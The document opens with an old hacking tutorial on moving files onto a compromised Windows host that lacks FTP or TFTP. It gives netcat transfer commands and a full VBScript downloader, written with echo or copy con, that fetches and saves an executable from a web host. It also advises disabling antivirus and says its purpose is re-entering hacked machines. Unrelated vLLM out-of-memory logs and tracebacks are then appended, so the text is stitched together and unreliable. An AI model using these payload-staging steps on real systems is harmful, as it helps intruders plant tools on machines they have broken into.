Additional_File_Transfer_Methods

无TFTP或FTP时的数据传输
本文介绍在没有TFTP或FTP的情况下如何从已获取shell权限的远程主机下载文件。主要介绍了使用Netcat进行文件传输的方法及使用.vbs脚本从网络下载文件的技术。
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

**********************************************************************************
*Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.*
*Tutorial Written By: DiabloHorn						 *
*Comment: This is intended mostly for rehacking, sometimes for hacking new ones	 *
*Creditz: Kimatrix,www.google.com						 *
*COMMENT: This is mostly intended to only download wget.exe with it dont try to  *
*download big things like serv-u						 *
**********************************************************************************


Index

0) Opening Words
1) The Netcat Way
2) .vbs script
3) Greetz

**********************************************************************************************************
*					0) Opening Words						 *
**********************************************************************************************************
Hmm what shall I say this time?									 
O yeah I'm trying to improve my english hope you will read tut's of mine with perfect english on it
pretty impossible but I'll try.									 
Well about the tutorial you are about to read, this tutorial is ment for when you are on a machine	 
you've got a shell but when typing the command tftp or ftp to get the files on it , it returns:	 
													 
"ftp" Command not recognized or some similar error.							 
													 
if that error sounds familiar then this tutorial might be for you.					 
I say might because if telnet is also deactivated then well to bad.					 													 
Hope you all still awake so read on and get started.							 

**********************************************************************************************************
*					1) The Netcat Way						 *
**********************************************************************************************************
Sub-Index

1) Purpose
2) Tools Needed
3) HowTo

1)	Purpose

Using 2 netcat's to retrieve a file

2)	Tools Needed

- a Shell
- 2 Netcat's
- File 2 Transfer

3)	HowTo

Fire up netcat on your machine like this:

nc.exe -l -p 4455 -u -vvv < file.exe

When done fire up netcat on the hacked machine like this:

nc.exe -u host port > outputfile.exe

When this is done therewill be a connection but nothing will be sent until you send a charachter from
own machine to the hacked one so just type something "a" would be enough and hit enter.
Now the stupid part with this you have no idea how long it will take so I suggest you DON'T
transfer serv-u with this, but rather a thing like wget.exe and then just download the stuff from the web.
This is tested locally and remote with normal acces to the shell so just tweak it until it works for you.



**********************************************************************************************************
*					2) .vbs script						 *
**********************************************************************************************************
Sub-Index

1) Purpose
2) Tools Needed
3) HowTo


1)	Purpose

this is ment to make a .vbs executable script that downloads a file from the web.
similar to wget but doesn't need to be uploaded also works when tftp and ftp and net commands
are disabled.


2)	Tools Needed

- a Shell
- a commandline editor
- if no commandline editor availible the ""echo" command

3)	HowTo

first of all make shure any anti-virus is disabled because a .vbs file sometimes get caught
by antivirus programs.

First I'll discuss the commandline editor option
then I'll discuss the echo option

########Commandline editor option####################

firt of all go to the directory you want the file to be downloaded to in example:

///////////////
cd c:/Recycler/
///////////////

when done do this:

/////////////////
copy con get.vbs/
/////////////////

when this is done you can inmediatly start typping text so let's type the following things

//////////////////////////////////////////////////////////////////////////////////////////
Dim DataBin										 /
Dim HTTPGET										 /
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")						 /
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False				 /
HTTPGET.Send										 /
DataBin = HTTPGET.ResponseBody								 /
Const adTypeBinary=1									 /
Const adSaveCreateOverWrite=2								 /
Dim SendBinary										 /
Set SendBinary = CreateObject("ADODB.Stream")						 /
SendBinary.Type = adTypeBinary								 /
SendBinary.Open										 /
SendBinary.Write DataBin								 /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite				 /
//////////////////////////////////////////////////////////////////////////////////////////

Things you MUST change in the above code:

////////////////////////////////////////////////////////////////////////////
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False 	   /	
								           /
Change that to the place where you're OWN .exe file is located		   /
									   /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite		   /
									   /
Change that to the name of the .exe file you want to have and it's location/
////////////////////////////////////////////////////////////////////////////

When done typing the above just save the file by pressing CTRL+Z when the file is saved
just execute it like a normal .exe and wait till the file is downloaded.

########ECHO option####################

////////////////////////////////////////////////////////////////////////////////////////////
echo Dim DataBin >c:/recycler/get.vbs							   /
echo Dim HTTPGET >>c:/recycler/get.vbs							   /
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:/recycler/get.vbs   		   /
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False >>c:/recycler/get.vbs / 
echo HTTPGET.Send >>c:/recycler/get.vbs							   /
echo DataBin = HTTPGET.ResponseBody >>c:/recycler/get.vbs				   /
echo Const adTypeBinary=1 >>c:/recycler/get.vbs						   /
echo Const adSaveCreateOverWrite=2 >>c:/recycler/get.vbs				   /
echo Dim SendBinary >>c:/recycler/get.vbs						   /
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:/recycler/get.vbs		   /
echo SendBinary.Type = adTypeBinary >>c:/recycler/get.vbs				   /
echo SendBinary.Open >>c:/recycler/get.vbs						   /
echo SendBinary.Write DataBin >>c:/recycler/get.vbs					   /
echo SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite >>c:/recycler/get.vbs	   /
////////////////////////////////////////////////////////////////////////////////////////////

Things you MUST change in the above code:

////////////////////////////////////////////////////////////////////////////
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False 	   /	
								           /
Change that to the place where you're OWN .exe file is located		   /
									   /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite		   /
									   /
Change that to the name of the .exe file you want to have and it's location/
////////////////////////////////////////////////////////////////////////////

When done just execute like normal .exe  and wait till the file is downloaded.

**********************************************************************************************************
*					3) Greetz							 *
**********************************************************************************************************


To the wonderfull world of internet and Kimatrix for helping me on testing the netcat things.

Hack it all just don't break it all.

Also want to say thx to all the peeps on NFE who gave me a nice place to learn in a quick way
new things and help other peeps out with my knowlegde.
INFO 09-12 08:12:49 __init__.py:207] Automatically detected platform cuda. INFO 09-12 08:12:49 api_server.py:912] vLLM API server version 0.7.3 INFO 09-12 08:12:49 api_server.py:913] args: Namespace(host=None, port=8003, uvicorn_log_level='info', allow_credentials=False, allowed_origins=['*'], allowed_methods=['*'], allowed_headers=['*'], api_key=None, lora_modules=None, prompt_adapters=None, chat_template=None, chat_template_content_format='auto', response_role='assistant', ssl_keyfile=None, ssl_certfile=None, ssl_ca_certs=None, ssl_cert_reqs=0, root_path=None, middleware=[], return_tokens_as_token_ids=False, disable_frontend_multiprocessing=False, enable_request_id_headers=False, enable_auto_tool_choice=False, enable_reasoning=False, reasoning_parser=None, tool_call_parser=None, tool_parser_plugin='', model='/models/DeepSeek-R1-Distill-Llama-70B', task='auto', tokenizer=None, skip_tokenizer_init=False, revision=None, code_revision=None, tokenizer_revision=None, tokenizer_mode='auto', trust_remote_code=False, allowed_local_media_path=None, download_dir=None, load_format='auto', config_format=<ConfigFormat.AUTO: 'auto'>, dtype='auto', kv_cache_dtype='auto', max_model_len=84320, guided_decoding_backend='xgrammar', logits_processor_pattern=None, model_impl='auto', distributed_executor_backend=None, pipeline_parallel_size=1, tensor_parallel_size=1, max_parallel_loading_workers=None, ray_workers_use_nsight=False, block_size=None, enable_prefix_caching=None, disable_sliding_window=False, use_v2_block_manager=True, num_lookahead_slots=0, seed=0, swap_space=4, cpu_offload_gb=0, gpu_memory_utilization=0.95, num_gpu_blocks_override=None, max_num_batched_tokens=512, max_num_partial_prefills=1, max_long_partial_prefills=1, long_prefill_token_threshold=0, max_num_seqs=1, max_logprobs=20, disable_log_stats=False, quantization=None, rope_scaling=None, rope_theta=None, hf_overrides=None, enforce_eager=True, max_seq_len_to_capture=8192, disable_custom_all_reduce=False, tokenizer_pool_size=0, tokenizer_pool_type='ray', tokenizer_pool_extra_config=None, limit_mm_per_prompt=None, mm_processor_kwargs=None, disable_mm_preprocessor_cache=False, enable_lora=False, enable_lora_bias=False, max_loras=1, max_lora_rank=16, lora_extra_vocab_size=256, lora_dtype='auto', long_lora_scaling_factors=None, max_cpu_loras=None, fully_sharded_loras=False, enable_prompt_adapter=False, max_prompt_adapters=1, max_prompt_adapter_token=0, device='auto', num_scheduler_steps=1, multi_step_stream_outputs=True, scheduler_delay_factor=0.0, enable_chunked_prefill=None, speculative_model=None, speculative_model_quantization=None, num_speculative_tokens=None, speculative_disable_mqa_scorer=False, speculative_draft_tensor_parallel_size=None, speculative_max_model_len=None, speculative_disable_by_batch_size=None, ngram_prompt_lookup_max=None, ngram_prompt_lookup_min=None, spec_decoding_acceptance_method='rejection_sampler', typical_acceptance_sampler_posterior_threshold=None, typical_acceptance_sampler_posterior_alpha=None, disable_logprobs_during_spec_decoding=None, model_loader_extra_config=None, ignore_patterns=[], preemption_mode=None, served_model_name=['DeepSeek-R1'], qlora_adapter_name_or_path=None, otlp_traces_endpoint=None, collect_detailed_traces=None, disable_async_output_proc=False, scheduling_policy='fcfs', scheduler_cls='vllm.core.scheduler.Scheduler', override_neuron_config=None, override_pooler_config=None, compilation_config=None, kv_transfer_config=None, worker_cls='auto', generation_config=None, override_generation_config=None, enable_sleep_mode=False, calculate_kv_scales=False, additional_config=None, disable_log_requests=False, max_log_len=None, disable_fastapi_docs=False, enable_prompt_tokens_details=False) INFO 09-12 08:12:49 api_server.py:209] Started engine process with PID 76 INFO 09-12 08:12:53 __init__.py:207] Automatically detected platform cuda. INFO 09-12 08:12:55 config.py:549] This model supports multiple tasks: {'generate', 'score', 'reward', 'embed', 'classify'}. Defaulting to 'generate'. WARNING 09-12 08:12:55 arg_utils.py:1187] Chunked prefill is enabled by default for models with max_model_len > 32K. Currently, chunked prefill might not work with some features or models. If you encounter any issues, please disable chunked prefill by setting --enable-chunked-prefill=False. INFO 09-12 08:12:55 config.py:1555] Chunked prefill is enabled with max_num_batched_tokens=512. WARNING 09-12 08:12:55 cuda.py:95] To see benefits of async output processing, enable CUDA graph. Since, enforce-eager is enabled, async output processor cannot be used WARNING 09-12 08:12:55 config.py:685] Async output processing is not supported on the current platform type cuda. INFO 09-12 08:12:58 config.py:549] This model supports multiple tasks: {'generate', 'embed', 'score', 'classify', 'reward'}. Defaulting to 'generate'. WARNING 09-12 08:12:58 arg_utils.py:1187] Chunked prefill is enabled by default for models with max_model_len > 32K. Currently, chunked prefill might not work with some features or models. If you encounter any issues, please disable chunked prefill by setting --enable-chunked-prefill=False. INFO 09-12 08:12:58 config.py:1555] Chunked prefill is enabled with max_num_batched_tokens=512. WARNING 09-12 08:12:58 cuda.py:95] To see benefits of async output processing, enable CUDA graph. Since, enforce-eager is enabled, async output processor cannot be used WARNING 09-12 08:12:58 config.py:685] Async output processing is not supported on the current platform type cuda. INFO 09-12 08:12:58 llm_engine.py:234] Initializing a V0 LLM engine (v0.7.3) with config: model='/models/DeepSeek-R1-Distill-Llama-70B', speculative_config=None, tokenizer='/models/DeepSeek-R1-Distill-Llama-70B', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, override_neuron_config=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=84320, download_dir=None, load_format=LoadFormat.AUTO, tensor_parallel_size=1, pipeline_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=True, kv_cache_dtype=auto, device_config=cuda, decoding_config=DecodingConfig(guided_decoding_backend='xgrammar'), observability_config=ObservabilityConfig(otlp_traces_endpoint=None, collect_model_forward_time=False, collect_model_execute_time=False), seed=0, served_model_name=DeepSeek-R1, num_scheduler_steps=1, multi_step_stream_outputs=True, enable_prefix_caching=False, chunked_prefill_enabled=True, use_async_output_proc=False, disable_mm_preprocessor_cache=False, mm_processor_kwargs=None, pooler_config=None, compilation_config={"splitting_ops":[],"compile_sizes":[],"cudagraph_capture_sizes":[],"max_capture_size":0}, use_cached_outputs=True, INFO 09-12 08:12:59 cuda.py:229] Using Flash Attention backend. INFO 09-12 08:13:00 model_runner.py:1110] Starting to load model /models/DeepSeek-R1-Distill-Llama-70B... ERROR 09-12 08:13:00 engine.py:400] CUDA out of memory. Tried to allocate 896.00 MiB. GPU 0 has a total capacity of 23.64 GiB of which 214.81 MiB is free. Process 20061 has 23.43 GiB memory in use. Of the allocated memory 22.99 GiB is allocated by PyTorch, and 1.57 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables) ERROR 09-12 08:13:00 engine.py:400] Traceback (most recent call last): Process SpawnProcess-1: ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 391, in run_mp_engine ERROR 09-12 08:13:00 engine.py:400] engine = MQLLMEngine.from_engine_args(engine_args=engine_args, ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 124, in from_engine_args ERROR 09-12 08:13:00 engine.py:400] return cls(ipc_path=ipc_path, ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 76, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.engine = LLMEngine(*args, **kwargs) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/engine/llm_engine.py", line 273, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.model_executor = executor_class(vllm_config=vllm_config, ) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/executor/executor_base.py", line 52, in __init__ ERROR 09-12 08:13:00 engine.py:400] self._init_executor() ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/executor/uniproc_executor.py", line 47, in _init_executor ERROR 09-12 08:13:00 engine.py:400] self.collective_rpc("load_model") ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/executor/uniproc_executor.py", line 56, in collective_rpc ERROR 09-12 08:13:00 engine.py:400] answer = run_method(self.driver_worker, method, args, kwargs) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/utils.py", line 2196, in run_method ERROR 09-12 08:13:00 engine.py:400] return func(*args, **kwargs) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/worker/worker.py", line 183, in load_model ERROR 09-12 08:13:00 engine.py:400] self.model_runner.load_model() ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/worker/model_runner.py", line 1112, in load_model ERROR 09-12 08:13:00 engine.py:400] self.model = get_model(vllm_config=self.vllm_config) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/__init__.py", line 14, in get_model ERROR 09-12 08:13:00 engine.py:400] return loader.load_model(vllm_config=vllm_config) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/loader.py", line 406, in load_model ERROR 09-12 08:13:00 engine.py:400] model = _initialize_model(vllm_config=vllm_config) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/loader.py", line 125, in _initialize_model ERROR 09-12 08:13:00 engine.py:400] return model_class(vllm_config=vllm_config, prefix=prefix) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 496, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.model = self._init_model(vllm_config=vllm_config, ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 533, in _init_model ERROR 09-12 08:13:00 engine.py:400] return LlamaModel(vllm_config=vllm_config, prefix=prefix) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/compilation/decorators.py", line 151, in __init__ ERROR 09-12 08:13:00 engine.py:400] old_init(self, vllm_config=vllm_config, prefix=prefix, **kwargs) ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 326, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.start_layer, self.end_layer, self.layers = make_layers( ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/utils.py", line 558, in make_layers ERROR 09-12 08:13:00 engine.py:400] maybe_offload_to_cpu(layer_fn(prefix=f"{prefix}.{idx}")) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 328, in <lambda> ERROR 09-12 08:13:00 engine.py:400] lambda prefix: layer_type(config=config, ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 254, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.mlp = LlamaMLP( ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 70, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.gate_up_proj = MergedColumnParallelLinear( Traceback (most recent call last): ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 441, in __init__ ERROR 09-12 08:13:00 engine.py:400] super().__init__(input_size=input_size, ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 314, in __init__ ERROR 09-12 08:13:00 engine.py:400] self.quant_method.create_weights( ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 129, in create_weights ERROR 09-12 08:13:00 engine.py:400] weight = Parameter(torch.empty(sum(output_partition_sizes), ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] File "/usr/local/lib/python3.12/dist-packages/torch/utils/_device.py", line 106, in __torch_function__ ERROR 09-12 08:13:00 engine.py:400] return func(*args, **kwargs) ERROR 09-12 08:13:00 engine.py:400] ^^^^^^^^^^^^^^^^^^^^^ ERROR 09-12 08:13:00 engine.py:400] torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 896.00 MiB. GPU 0 has a total capacity of 23.64 GiB of which 214.81 MiB is free. Process 20061 has 23.43 GiB memory in use. Of the allocated memory 22.99 GiB is allocated by PyTorch, and 1.57 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables) File "/usr/lib/python3.12/multiprocessing/process.py", line 314, in _bootstrap self.run() File "/usr/lib/python3.12/multiprocessing/process.py", line 108, in run self._target(*self._args, **self._kwargs) File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 402, in run_mp_engine raise e File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 391, in run_mp_engine engine = MQLLMEngine.from_engine_args(engine_args=engine_args, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 124, in from_engine_args return cls(ipc_path=ipc_path, ^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/engine/multiprocessing/engine.py", line 76, in __init__ self.engine = LLMEngine(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/engine/llm_engine.py", line 273, in __init__ self.model_executor = executor_class(vllm_config=vllm_config, ) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/executor/executor_base.py", line 52, in __init__ self._init_executor() File "/usr/local/lib/python3.12/dist-packages/vllm/executor/uniproc_executor.py", line 47, in _init_executor self.collective_rpc("load_model") File "/usr/local/lib/python3.12/dist-packages/vllm/executor/uniproc_executor.py", line 56, in collective_rpc answer = run_method(self.driver_worker, method, args, kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/utils.py", line 2196, in run_method return func(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/worker/worker.py", line 183, in load_model self.model_runner.load_model() File "/usr/local/lib/python3.12/dist-packages/vllm/worker/model_runner.py", line 1112, in load_model self.model = get_model(vllm_config=self.vllm_config) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/__init__.py", line 14, in get_model return loader.load_model(vllm_config=vllm_config) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/loader.py", line 406, in load_model model = _initialize_model(vllm_config=vllm_config) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/model_loader/loader.py", line 125, in _initialize_model return model_class(vllm_config=vllm_config, prefix=prefix) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 496, in __init__ self.model = self._init_model(vllm_config=vllm_config, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 533, in _init_model return LlamaModel(vllm_config=vllm_config, prefix=prefix) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/compilation/decorators.py", line 151, in __init__ old_init(self, vllm_config=vllm_config, prefix=prefix, **kwargs) File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 326, in __init__ self.start_layer, self.end_layer, self.layers = make_layers( ^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/utils.py", line 558, in make_layers maybe_offload_to_cpu(layer_fn(prefix=f"{prefix}.{idx}")) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 328, in <lambda> lambda prefix: layer_type(config=config, ^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 254, in __init__ self.mlp = LlamaMLP( ^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/models/llama.py", line 70, in __init__ self.gate_up_proj = MergedColumnParallelLinear( ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 441, in __init__ super().__init__(input_size=input_size, File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 314, in __init__ self.quant_method.create_weights( File "/usr/local/lib/python3.12/dist-packages/vllm/model_executor/layers/linear.py", line 129, in create_weights weight = Parameter(torch.empty(sum(output_partition_sizes), ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/torch/utils/_device.py", line 106, in __torch_function__ return func(*args, **kwargs) ^^^^^^^^^^^^^^^^^^^^^ torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 896.00 MiB. GPU 0 has a total capacity of 23.64 GiB of which 214.81 MiB is free. Process 20061 has 23.43 GiB memory in use. Of the allocated memory 22.99 GiB is allocated by PyTorch, and 1.57 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables) [rank0]:[W912 08:13:00.032028245 ProcessGroupNCCL.cpp:1250] Warning: WARNING: process group has NOT been destroyed before we destruct ProcessGroupNCCL. On normal program exit, the application should call destroy_process_group to ensure that any pending NCCL operations have finished in this process. In rare cases this process can exit before this point and block the progress of another member of the process group. This constraint has always been present, but this warning has only been added since PyTorch 2.4 (function operator()) Traceback (most recent call last): File "<frozen runpy>", line 198, in _run_module_as_main File "<frozen runpy>", line 88, in _run_code File "/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py", line 991, in <module> uvloop.run(run_server(args)) File "/usr/local/lib/python3.12/dist-packages/uvloop/__init__.py", line 109, in run return __asyncio.run( ^^^^^^^^^^^^^^ File "/usr/lib/python3.12/asyncio/runners.py", line 195, in run return runner.run(main) ^^^^^^^^^^^^^^^^ File "/usr/lib/python3.12/asyncio/runners.py", line 118, in run return self._loop.run_until_complete(task) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "uvloop/loop.pyx", line 1518, in uvloop.loop.Loop.run_until_complete File "/usr/local/lib/python3.12/dist-packages/uvloop/__init__.py", line 61, in wrapper return await main ^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py", line 947, in run_server async with build_async_engine_client(args) as engine_client: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.12/contextlib.py", line 210, in __aenter__ return await anext(self.gen) ^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py", line 139, in build_async_engine_client async with build_async_engine_client_from_engine_args( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.12/contextlib.py", line 210, in __aenter__ return await anext(self.gen) ^^^^^^^^^^^^^^^^^^^^^ File "/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py", line 233, in build_async_engine_client_from_engine_args raise RuntimeError( RuntimeError: Engine process failed to start. See stack trace for the root cause. ubuntu docker部署DeepSeek-R1-Distill-Llama-70B 模型 报错
09-13
(vllm) zhzx@zhzx-S2600WF-LS:/media/zhzx/ssd2/Qwen3-32B$ vllm serve "/media/zhzx/ssd2/Qwen3-32B" --host 0.0.0.0 --port 8060 --dtype bfloat16 --tensor-parallel-size 2 --cpu-offload-gb 20 --gpu-memory-utilization 0.8 --max-model-len 8126 --api-key token-abc123 --enable-prefix-caching --trust-remote-code \ > INFO 05-10 20:06:33 [__init__.py:239] Automatically detected platform cuda. INFO 05-10 20:06:36 [api_server.py:1043] vLLM API server version 0.8.5.post1 INFO 05-10 20:06:36 [api_server.py:1044] args: Namespace(subparser='serve', model_tag='/media/zhzx/ssd2/Qwen3-32B', config='', host='0.0.0.0', port=8060, uvicorn_log_level='info', disable_uvicorn_access_log=False, allow_credentials=False, allowed_origins=['*'], allowed_methods=['*'], allowed_headers=['*'], api_key='token-abc123', lora_modules=None, prompt_adapters=None, chat_template=None, chat_template_content_format='auto', response_role='assistant', ssl_keyfile=None, ssl_certfile=None, ssl_ca_certs=None, enable_ssl_refresh=False, ssl_cert_reqs=0, root_path=None, middleware=[], return_tokens_as_token_ids=False, disable_frontend_multiprocessing=False, enable_request_id_headers=False, enable_auto_tool_choice=False, tool_call_parser=None, tool_parser_plugin='', model='/media/zhzx/ssd2/Qwen3-32B', task='auto', tokenizer=None, hf_config_path=None, skip_tokenizer_init=False, revision=None, code_revision=None, tokenizer_revision=None, tokenizer_mode='auto', trust_remote_code=True, allowed_local_media_path=None, load_format='auto', download_dir=None, model_loader_extra_config={}, use_tqdm_on_load=True, config_format=<ConfigFormat.AUTO: 'auto'>, dtype='bfloat16', max_model_len=8126, 